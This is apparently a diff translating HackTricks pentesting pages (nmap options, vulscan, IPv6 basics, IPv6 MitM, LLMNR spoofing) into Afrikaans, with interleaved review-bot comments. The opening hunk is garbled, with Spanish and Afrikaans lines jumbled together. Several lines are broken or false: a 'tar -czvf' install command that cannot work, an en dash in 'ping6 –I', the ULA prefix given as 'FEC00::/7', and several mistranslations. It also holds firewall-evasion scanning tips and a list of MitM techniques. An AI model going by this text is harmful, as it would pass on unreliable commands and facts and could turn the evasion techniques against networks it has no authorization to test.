||||
**--randomize-hosts** Para que el ataque sea menos obvio
|
||||
**-oN file** Normale uitset
|
||||
|
||||
**--spoof-mac** _**\<MAC address, prefix, or vendor name>**_ Para cambiar la mac ejemplos: Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2, and Cisco
|
||||
**-oX file** XML-uitset
|
||||
|
||||
**--proxies** _**\<Comma-separated list of proxy URLs>**_ Para usar proxies, a veces un proxy no mantiene tantas conexiones abiertas como nmap quiere por lo que habria que modificar el paralelismo: --max-parallelism
|
||||
**-oS file** Script kidies-uitset
|
||||
|
||||
**-sP** Para descubrir host en la red en la que estamos por ARP
|
||||
**-oG file** Grepable uitset
|
||||
|
||||
Muchos administradores crean una regla en el firewall que permite pasar todos los paquetes que provienen de un puerto en particular (como el 20,53 y 67), podemos decire a nmap que mande nuestros paquetes desde esos puertos: **nmap --source-port 53 Ip**
|
||||
**-oA file** Alles behalwe -oS
|
||||
|
||||
**Salidas**
|
||||
**-v level** verbytheid
|
||||
|
||||
**-oN file** Salida normal
|
||||
**-d level** foutopsporing
|
||||
|
||||
**-oX file** Salida XML
|
||||
**--reason** Rede vir gasheer en status
|
||||
|
||||
**-oS file** Salida de script kidies
|
||||
**--stats-every time** Elke tyd vertel ons hoe dit gaan
|
||||
|
||||
**-oG file** Salida grepable
|
||||
**--packet-trace** Om te sien watter pakkies uitgaan, kan filters soos --version-trace of --script-trace gespesifiseer word
|
||||
|
||||
**-oA file** Todos menos -oS
|
||||
**--open** wys die oop, oop|gefilterde en nie-gefilterde
|
||||
|
||||
**-v level** verbosity
|
||||
**--resume file** Gee 'n opsomming
|
||||
|
||||
**-d level** debugin
|
||||
**Miscellaneous**
|
||||
|
||||
**--reason** Porqué del host y estado
|
||||
**-6** Maak ipv6 moontlik
|
||||
|
||||
**--stats-every time** Cada ese tiempo nos dice como va
|
||||
|
||||
**--packet-trace** Para ver que paquetes salen se pueden especificar filtros como: --version-trace o --script-trace
|
||||
|
||||
**--open** muestra los abiertos, abiertos|filtrados y los no filtrados
|
||||
|
||||
**--resume file** Saca un resumen
|
||||
|
||||
**Miscelanea**
|
||||
|
||||
**-6** Permite ipv6
|
||||
|
||||
**-A** es lo mismo que -O -sV -sC --traceroute
|
||||
**-A** Dit is dieselfde as -O -sV -sC --traceroute
|
||||
|
||||
**Run time**
|
||||
|
||||
Mientras corre nmap podemos cambiar opciones:
|
||||
Terwyl nmap loop, kan ons opsies verander:
|
||||
|
||||
v / V Increase / decrease the verbosity level
|
||||
v / V Verhoog / verlaag die verbytheidvlak
|
||||
|
||||
d / D Increase / decrease the debugging Level
|
||||
d / D Verhoog / verlaag die foutopsporingsvlak
|
||||
|
||||
p / P Turn on / off packet tracing
|
||||
p / P Skakel pakketspoor aan / af
|
||||
|
||||
? Print a runtime interaction help screen
|
||||
? Druk 'n hulpskerm vir interaksie tydens uitvoering af
|
||||
|
||||
**Vulscan**
|
||||
|
||||
Script de nmap que mira las versiones de los servicios obtenidos en una base de datos offline (que descarga de otras muy importantes) y devuelve las posibles vulnerabilidades
|
||||
'n Nmap-skrips wat die weergawes van dienste in 'n aflyn-databasis (wat dit aflaai van ander belangrike databasisse) ondersoek en moontlike kwesbaarhede teruggee
|
||||
|
||||
Las BD que usa son:
|
||||
Die databasisse wat dit gebruik, is:
|
||||
|
||||
1. Scipvuldb.csv | [http://www.scip.ch/en/?vuldb](http://www.scip.ch/en/?vuldb)
|
||||
2. Cve.csv | [http://cve.mitre.org](http://cve.mitre.org/)
|
||||
|
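Review bot: the translation is cut off mid-word and drops content: the new-side line for `--data-length` ends at "met deze optie kunnen we een bepa", and the entries that follow it on the old side (`--ip-options`, the `--packet-trace` pointer with its seclists link, `--ttl`, `--randomize-hosts` and `--spoof-mac`) have no counterpart on the new side, so they vanish from the page. Suggest completing the `--data-length` sentence and restoring those five entries. Three smaller points in the same region: `..mtu` in the `-f` paragraph should read `--mtu`; the decoy sentence "Ze werken niet met offline TCP-versiedetectie" misstates the Nmap limitation, which is that decoys do not work with version detection (`-sV`) or TCP connect scan (`-sT`); and `--resume file` does not "give a summary" ("Gee 'n opsomming"), it resumes an aborted scan from a normal (`-oN`) or grepable (`-oG`) output file.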
@ -247,36 +219,36 @@ Las BD que usa son:
|
|||
7. Exploitdb.csv | [http://www.exploit-db.com](http://www.exploit-db.com/)
|
||||
8. Openvas.csv | [http://www.openvas.org](http://www.openvas.org/)
|
||||
|
||||
Para descargarlo e instalarlo en la carpeta de Nmap:
|
||||
Om dit af te laai en in die Nmap-lys te installeer:
|
||||
|
||||
wget http://www.computec.ch/projekte/vulscan/download/nmap\_nse\_vulscan-2.0.tar.gz && tar -czvf nmap\_nse\_vulscan-2.0.tar.gz vulscan/ && sudo cp -r vulscan/ /usr/share/nmap/scripts/
|
||||
|
||||
También habría que descargar los paquetes de las BD y añadirlos a /usr/share/nmap/scripts/vulscan/
|
||||
Daar sal ook pakkette van die databasisse afgelaai moet word en by /usr/share/nmap/scripts/vulscan/ gevoeg moet word
|
||||
|
||||
Uso:
|
||||
Gebruik:
|
||||
|
||||
Para usar todos: sudo nmap -sV --script=vulscan HOST\_A\_ESCANEAR
|
||||
Om almal te gebruik: sudo nmap -sV --script=vulscan HOST\_A\_ESCANEAR
|
||||
|
||||
Para usar una BD específica: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_A\_ESCANEAR
|
||||
Om 'n spesifieke databasis te gebruik: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_A\_ESCANEAR
|
||||
|
||||
## Speed Up Nmap Service scan x16
|
||||
## Versnel Nmap-dienskenner 16 keer
|
||||
|
||||
According [**to this post**](https://joshua.hu/nmap-speedup-service-scanning-16x) you can speed up the nmap service analysis by modifying all the **`totalwaitms`** values in **`/usr/share/nmap/nmap-service-probes`** to **300** and **`tcpwrappedms`** to **200**.
|
||||
Volgens [**hierdie berig**](https://joshua.hu/nmap-speedup-service-scanning-16x) kan jy die nmap-diensanalise versnel deur al die **`totalwaitms`** waardes in **`/usr/share/nmap/nmap-service-probes`** te wysig na **300** en **`tcpwrappedms`** na **200**.
|
||||
|
||||
Moreover, probes which do not have a specifically defined **`servicewaitms`** use a default value of **`5000`**. Therefore, we can either add values to each of the probes, or we can **compile nmap** ourselves and change the default value in [**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79).
|
||||
Verder gebruik sonder 'n spesifiek gedefinieerde **`servicewaitms`** gebruik 'n verstekwaarde van **`5000`**. Daarom kan ons waardes byvoeg vir elkeen van die sondes, of ons kan **nmap kompileer** en die verstekwaarde in [**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79) verander.
|
||||
|
||||
If you don't want to change the values of **`totalwaitms`** and **`tcpwrappedms`** at all in the `/usr/share/nmap/nmap-service-probes` file, you can edit the [parsing code](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) such that these values in the `nmap-service-probes` file are completely ignored.
|
||||
As jy glad nie die waardes van **`totalwaitms`** en **`tcpwrappedms`** in die `/usr/share/nmap/nmap-service-probes` lêer wil verander nie, kan jy die [parsingskode](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) wysig sodat hierdie waardes in die `nmap-service-probes` lêer heeltemal geïgnoreer word.
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil hê jou **maatskappy geadverteer moet word in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
|
|
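Review bot: the install one-liner `wget ... nmap_nse_vulscan-2.0.tar.gz && tar -czvf nmap_nse_vulscan-2.0.tar.gz vulscan/ && sudo cp -r vulscan/ /usr/share/nmap/scripts/` uses `-c` (create), so it overwrites the freshly downloaded archive with a new one built from a `vulscan/` directory that does not exist yet, and the `cp` then has nothing to copy; the flag should be `-xzvf`. This is an unchanged context line, but since the surrounding text is being rewritten it is worth fixing in the same commit. Also, the placeholder `HOST_A_ESCANEAR` in the two usage lines is left in Spanish in the Afrikaans text (e.g. `<teiken>` would fit), "in die Nmap-lys" should be "in die Nmap-gids" (a folder, not a list), and the sentence "Verder gebruik sonder 'n spesifiek gedefinieerde servicewaitms gebruik 'n verstekwaarde van 5000" is garbled and should read along the lines of "Verder gebruik sondes sonder 'n spesifiek gedefinieerde servicewaitms 'n verstekwaarde van 5000".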
@ -1,47 +1,44 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# IPv6 Basic theory
|
||||
# IPv6 Basiese teorie
|
||||
|
||||
## Networks
|
||||
## Netwerke
|
||||
|
||||
IPv6 addresses are structured to enhance network organization and device interaction. An IPv6 address is divided into:
|
||||
IPv6-adresse is gestruktureer om netwerkorganisasie en toestelinteraksie te verbeter. 'n IPv6-adres is verdeel in:
|
||||
|
||||
1. **Network Prefix**: The initial 48 bits, determining the network segment.
|
||||
2. **Subnet ID**: Following 16 bits, used for defining specific subnets within the network.
|
||||
3. **Interface Identifier**: The concluding 64 bits, uniquely identifying a device within the subnet.
|
||||
1. **Netwerkvoorvoegsel**: Die aanvanklike 48-bits, wat die netwerksegment bepaal.
|
||||
2. **Subnet-ID**: Die volgende 16-bits, wat gebruik word om spesifieke subnets binne die netwerk te definieer.
|
||||
3. **Interface-identifiseerder**: Die afsluitende 64-bits, wat 'n toestel uniek identifiseer binne die subnet.
|
||||
|
||||
While IPv6 omits the ARP protocol found in IPv4, it introduces **ICMPv6** with two primary messages:
|
||||
- **Neighbor Solicitation (NS)**: Multicast messages for address resolution.
|
||||
- **Neighbor Advertisement (NA)**: Unicast responses to NS or spontaneous announcements.
|
||||
Terwyl IPv6 die ARP-protokol wat in IPv4 gevind word, uitsluit, voer dit **ICMPv6** in met twee primêre boodskappe:
|
||||
- **Neighbor Solicitation (NS)**: Multicast-boodskappe vir adresoplossing.
|
||||
- **Neighbor Advertisement (NA)**: Unicast-respons op NS of spontane aankondigings.
|
||||
|
||||
IPv6 also incorporates special address types:
|
||||
- **Loopback Address (`::1`)**: Equivalent to IPv4's `127.0.0.1`, for internal communication within the host.
|
||||
- **Link-Local Addresses (`FE80::/10`)**: For local network activities, not for internet routing. Devices on the same local network can discover each other using this range.
|
||||
IPv6 inkorporeer ook spesiale adressoorte:
|
||||
- **Loopback-adres (`::1`)**: Gelykwaardig aan IPv4 se `127.0.0.1`, vir interne kommunikasie binne die gasheer.
|
||||
- **Link-Local-adresse (`FE80::/10`)**: Vir plaaslike netwerkaktiwiteite, nie vir internetroetevering nie. Toestelle op dieselfde plaaslike netwerk kan mekaar ontdek deur hierdie reeks te gebruik.
|
||||
|
||||
### Practical Usage of IPv6 in Network Commands
|
||||
### Praktiese Gebruik van IPv6 in Netwerkopdragte
|
||||
|
||||
To interact with IPv6 networks, you can use various commands:
|
||||
- **Ping Link-Local Addresses**: Check the presence of local devices using `ping6`.
|
||||
- **Neighbor Discovery**: Use `ip neigh` to view devices discovered at the link layer.
|
||||
- **alive6**: An alternative tool for discovering devices on the same network.
|
||||
|
||||
Below are some command examples:
|
||||
Om met IPv6-netwerke te kommunikeer, kan jy verskeie opdragte gebruik:
|
||||
- **Ping Link-Local-adresse**: Kontroleer die teenwoordigheid van plaaslike toestelle met behulp van `ping6`.
|
||||
- **Neighbor Discovery**: Gebruik `ip neigh` om toestelle wat by die skakellaag ontdek is, te sien.
|
||||
- **alive6**: 'n Alternatiewe hulpmiddel vir die ontdekking van toestelle op dieselfde netwerk.
|
||||
|
||||
Hieronder is 'n paar voorbeelde van opdragte:
|
||||
```bash
|
||||
ping6 –I eth0 -c 5 ff02::1 > /dev/null 2>&1
|
||||
ip neigh | grep ^fe80
|
||||
|
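Review bot: the `ping6 –I eth0 -c 5 ff02::1 > /dev/null 2>&1` line in the code block uses a Unicode en dash (U+2013) before `I` instead of an ASCII hyphen, so a reader who copies it gets an unknown-host error rather than a multicast ping; it should be `ping6 -I eth0 -c 5 ff02::1`. This is an unchanged context line, so the defect predates the commit, but the prose around it is being rewritten here and the fix belongs in the same change.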
@ -49,74 +46,68 @@ ip neigh | grep ^fe80
|
|||
# Alternatively, use alive6 for neighbor discovery
|
||||
alive6 eth0
|
||||
```
|
||||
IPv6-adresse kan afgelei word van 'n toestel se MAC-adres vir plaaslike kommunikasie. Hier is 'n vereenvoudigde gids oor hoe om die Skakelplaaslike IPv6-adres af te lei van 'n bekende MAC-adres, en 'n kort oorsig van IPv6-adres tipes en metodes om IPv6-adresse binne 'n netwerk te ontdek.
|
||||
|
||||
IPv6 addresses can be derived from a device's MAC address for local communication. Here's a simplified guide on how to derive the Link-local IPv6 address from a known MAC address, and a brief overview of IPv6 address types and methods to discover IPv6 addresses within a network.
|
||||
## **Afleiding van Skakelplaaslike IPv6 vanaf MAC-adres**
|
||||
|
||||
## **Deriving Link-local IPv6 from MAC Address**
|
||||
Gegee 'n MAC-adres **`12:34:56:78:9a:bc`**, kan jy die Skakelplaaslike IPv6-adres as volg konstrueer:
|
||||
|
||||
Given a MAC address **`12:34:56:78:9a:bc`**, you can construct the Link-local IPv6 address as follows:
|
||||
1. Omskep MAC na IPv6-formaat: **`1234:5678:9abc`**
|
||||
2. Voeg `fe80::` voor en voeg `fffe` in die middel in: **`fe80::1234:56ff:fe78:9abc`**
|
||||
3. Keer die sewende bit van links af om, verander `1234` na `1034`: **`fe80::1034:56ff:fe78:9abc`**
|
||||
|
||||
1. Convert MAC to IPv6 format: **`1234:5678:9abc`**
|
||||
2. Prepend `fe80::` and insert `fffe` in the middle: **`fe80::1234:56ff:fe78:9abc`**
|
||||
3. Invert the seventh bit from the left, changing `1234` to `1034`: **`fe80::1034:56ff:fe78:9abc`**
|
||||
## **IPv6-adrestipes**
|
||||
|
||||
## **IPv6 Address Types**
|
||||
- **Unieke Lokale Adres (ULA)**: Vir plaaslike kommunikasie, nie bedoel vir openbare internetroetering nie. Voorvoegsel: **`FEC00::/7`**
|
||||
- **Multicast-adres**: Vir een-tot-baie kommunikasie. Afgelewer aan alle koppelvlakke in die multicast-groep. Voorvoegsel: **`FF00::/8`**
|
||||
- **Anycast-adres**: Vir een-tot-naaste kommunikasie. Gestuur na die naaste koppelvlak volgens die roeteprotokol. Deel van die globale unicast-reeks **`2000::/3`**.
|
||||
|
||||
- **Unique Local Address (ULA)**: For local communications, not meant for public internet routing. Prefix: **`FEC00::/7`**
|
||||
- **Multicast Address**: For one-to-many communication. Delivered to all interfaces in the multicast group. Prefix: **`FF00::/8`**
|
||||
- **Anycast Address**: For one-to-nearest communication. Sent to the closest interface as per routing protocol. Part of the **`2000::/3`** global unicast range.
|
||||
## **Adresvoorvoegsels**
|
||||
- **fe80::/10**: Skakelplaaslike adresse (soortgelyk aan 169.254.x.x)
|
||||
- **fc00::/7**: Unieke Lokale-Unicast (soortgelyk aan privaat IPv4-reeks soos 10.x.x.x, 172.16.x.x, 192.168.x.x)
|
||||
- **2000::/3**: Globale Unicast
|
||||
- **ff02::1**: Multicast Alle Knope
|
||||
- **ff02::2**: Multicast Router Knope
|
||||
|
||||
## **Address Prefixes**
|
||||
- **fe80::/10**: Link-Local addresses (similar to 169.254.x.x)
|
||||
- **fc00::/7**: Unique Local-Unicast (similar to private IPv4 ranges like 10.x.x.x, 172.16.x.x, 192.168.x.x)
|
||||
- **2000::/3**: Global Unicast
|
||||
- **ff02::1**: Multicast All Nodes
|
||||
- **ff02::2**: Multicast Router Nodes
|
||||
## **Ontdekking van IPv6-adresse binne 'n Netwerk**
|
||||
|
||||
## **Discovering IPv6 Addresses within a Network**
|
||||
|
||||
### Way 1: Using Link-local Addresses
|
||||
1. Obtain the MAC address of a device within the network.
|
||||
2. Derive the Link-local IPv6 address from the MAC address.
|
||||
|
||||
### Way 2: Using Multicast
|
||||
1. Send a ping to the multicast address `ff02::1` to discover IPv6 addresses on the local network.
|
||||
### Metode 1: Gebruik van Skakelplaaslike Adresse
|
||||
1. Verkry die MAC-adres van 'n toestel binne die netwerk.
|
||||
2. Leid die Skakelplaaslike IPv6-adres af van die MAC-adres.
|
||||
|
||||
### Metode 2: Gebruik van Multicast
|
||||
1. Stuur 'n ping na die multicast-adres `ff02::1` om IPv6-adresse op die plaaslike netwerk te ontdek.
|
||||
```bash
|
||||
service ufw stop # Stop the firewall
|
||||
ping6 -I <IFACE> ff02::1 # Send a ping to multicast address
|
||||
ip -6 neigh # Display the neighbor table
|
||||
```
|
||||
## IPv6 Man-in-the-Middle (MitM) Aanvalle
|
||||
Verskeie tegnieke bestaan vir die uitvoering van MitM-aanvalle in IPv6-netwerke, soos:
|
||||
|
||||
## IPv6 Man-in-the-Middle (MitM) Attacks
|
||||
Several techniques exist for executing MitM attacks in IPv6 networks, such as:
|
||||
|
||||
- Spoofing ICMPv6 neighbor or router advertisements.
|
||||
- Using ICMPv6 redirect or "Packet Too Big" messages to manipulate routing.
|
||||
- Attacking mobile IPv6 (usually requires IPSec to be disabled).
|
||||
- Setting up a rogue DHCPv6 server.
|
||||
- Spoofing van ICMPv6-buurman of roeteadvertensies.
|
||||
- Gebruik van ICMPv6-omleiding of "Pakket Te Groot" boodskappe om roetes te manipuleer.
|
||||
- Aanvalle op mobiele IPv6 (vereis gewoonlik dat IPSec gedeaktiveer word).
|
||||
- Opstel van 'n valse DHCPv6-bediener.
|
||||
|
||||
|
||||
# Identifying IPv6 Addresses in the eild
|
||||
|
||||
## Exploring Subdomains
|
||||
A method to find subdomains that are potentially linked to IPv6 addresses involves leveraging search engines. For instance, employing a query pattern like `ipv6.*` can be effective. Specifically, the following search command can be used in Google:
|
||||
# Identifisering van IPv6-adresse in die veld
|
||||
|
||||
## Verkenning van Subdomeine
|
||||
'n Metode om subdomeine te vind wat moontlik gekoppel is aan IPv6-adresse, behels die gebruik van soektogmasjiene. Byvoorbeeld, die gebruik van 'n soekpatroon soos `ipv6.*` kan effektief wees. Spesifiek kan die volgende soekopdrag in Google gebruik word:
|
||||
```bash
|
||||
site:ipv6./
|
||||
```
|
||||
## Die gebruik van DNS-navrae
|
||||
Om IPv6-adresse te identifiseer, kan sekere DNS-rekordtipes ondervra word:
|
||||
- **AXFR**: Versoek 'n volledige sone-oordrag en kan 'n wye verskeidenheid DNS-rekords blootlê.
|
||||
- **AAAA**: Soek direk na IPv6-adresse.
|
||||
- **ANY**: 'n Breë navraag wat alle beskikbare DNS-rekords teruggee.
|
||||
|
||||
## Utilizing DNS Queries
|
||||
To identify IPv6 addresses, certain DNS record types can be queried:
|
||||
- **AXFR**: Requests a complete zone transfer, potentially uncovering a wide range of DNS records.
|
||||
- **AAAA**: Directly seeks out IPv6 addresses.
|
||||
- **ANY**: A broad query that returns all available DNS records.
|
||||
## Ondersoek met Ping6
|
||||
Nadat IPv6-adresse wat met 'n organisasie verband hou, geïdentifiseer is, kan die `ping6` nut gebruik word vir ondersoek. Hierdie hulpmiddel help om die reaksievermoë van geïdentifiseerde IPv6-adresse te assesseer en kan ook help om aangrensende IPv6-toestelle te ontdek.
|
||||
|
||||
## Probing with Ping6
|
||||
After pinpointing IPv6 addresses associated with an organization, the `ping6` utility can be used for probing. This tool helps in assessing the responsiveness of identified IPv6 addresses, and might also assist in discovering adjacent IPv6 devices.
|
||||
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
|
||||
* [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html)
|
||||
* [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904)
|
||||
|
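Review bot: the Unique Local Address line ("Unieke Lokale Adres (ULA) ... Voorvoegsel: FEC00::/7", carried over from the English "Prefix: FEC00::/7") is wrong: ULA is `fc00::/7` (RFC 4193), and `fec0::/10` was the deprecated site-local range; the same file already lists `fc00::/7` correctly under "Adresvoorvoegsels" a few lines later, so the two entries contradict each other. Suggest changing the ULA prefix to `fc00::/7`. Also, the Google example `site:ipv6./` does not match the `ipv6.*` pattern the preceding sentence describes and should be made consistent with it (this is a context line, so the error predates the commit).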
@ -124,16 +115,14 @@ After pinpointing IPv6 addresses associated with an organization, the `ping6` ut
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
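Review bot: the shared footer is translated differently in each file of this commit: here "haktruuks" and "github-opslag", in the spoofing page "hacktruuks" and "github-repos", in the EAP-TLS page "hacking-truuks". Since this block is identical in every page, pick one form (for example "hacktruuks" and "github-repos") and use it everywhere, so a later search-and-replace across the translation stays mechanical.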
@ -1,85 +1,82 @@
# Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
# Spoofing LLMNR, NBT-NS, mDNS/DNS en WPAD en Relay-aanvalle
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Network Protocols
## Netwerkprotokolle
### Local Host Resolution Protocols
- **LLMNR, NBT-NS, and mDNS**:
- Microsoft and other operating systems use LLMNR and NBT-NS for local name resolution when DNS fails. Similarly, Apple and Linux systems use mDNS.
- These protocols are susceptible to interception and spoofing due to their unauthenticated, broadcast nature over UDP.
- [Responder](https://github.com/lgandx/Responder) can be used to impersonate services by sending forged responses to hosts querying these protocols.
- Further information on service impersonation using Responder can be found [here](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
### Plaaslike Gasresolusieprotokolle
- **LLMNR, NBT-NS en mDNS**:
